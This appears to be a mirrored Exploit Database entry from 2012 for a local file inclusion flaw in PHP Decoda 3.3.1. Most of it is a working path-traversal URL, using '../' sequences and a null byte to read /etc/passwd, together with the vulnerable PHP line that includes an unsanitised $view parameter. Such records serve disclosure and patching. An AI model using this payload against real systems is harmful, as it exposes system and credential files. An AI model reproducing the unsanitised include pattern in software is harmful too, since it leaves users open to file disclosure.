PHP Decoda 3.3.1 – Local File Inclusion

• Exploit Database
• 9 阅读

• 作者： Number 7
  日期： 2012-06-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19179/

• ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  # Exploit Title: [php-decoda local file inclusion ]
  # Date: [16/06/2012]
  # Author: [Number 7]
  # Software Link: [http://milesj.me/code/php/decoda]
  # Version: [3.3.1]
  # Tested on: [linux]
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Exp: 
  http://localhost/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00
   
  ~~Line 111 in Index.php:
  	<?php	include $view .'.php'; ?>
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Blogpot: [http://TunisianSeven.blogspot.com/]
  Twitter: [@TunisianSeven]